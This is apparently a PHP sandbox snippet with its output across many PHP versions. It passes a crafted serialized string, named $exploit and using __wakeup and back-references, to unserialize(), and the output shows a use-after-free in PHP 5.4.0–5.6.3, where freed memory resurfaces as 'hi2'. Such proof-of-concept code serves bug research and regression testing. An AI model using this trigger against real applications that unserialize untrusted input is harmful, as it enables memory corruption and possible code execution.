<?php
class obj {
var $prop;
function __wakeup() {
$this->prop = 1;
}
}
$exploit = 'a:3:{i:0;O:9:"exception":1:{s:16:"'."\0".'Exception'."\0".'trace";a:0:{}}i:0;O:3:"obj":1:{s:4:"prop";R:2;}i:2;R:3;}';
$x = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($x);
- Output for 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
- array(2) {
[0]=>
int(1)
[2]=>
array(0) {
}
}
- Output for 5.4.39 - 5.4.45, 5.5.23 - 5.5.38, 5.6.7 - 5.6.40
- array(2) {
[0]=>
object(obj)#2 (1) {
["prop"]=>
int(1)
}
[2]=>
array(0) {
}
}
- Output for 5.4.36 - 5.4.38, 5.5.20 - 5.5.22, 5.6.4 - 5.6.6
- array(2) {
[0]=>
object(obj)#2 (1) {
["prop"]=>
int(1)
}
[2]=>
&NULL
}
- Output for 5.4.0 - 5.4.35, 5.5.0 - 5.5.19, 5.6.0 - 5.6.3
- array(2) {
[0]=>
object(obj)#2 (1) {
["prop"]=>
int(1)
}
[2]=>
string(3) "hi2"
}
preferences:
272.18 ms | 402 KiB | 375 Q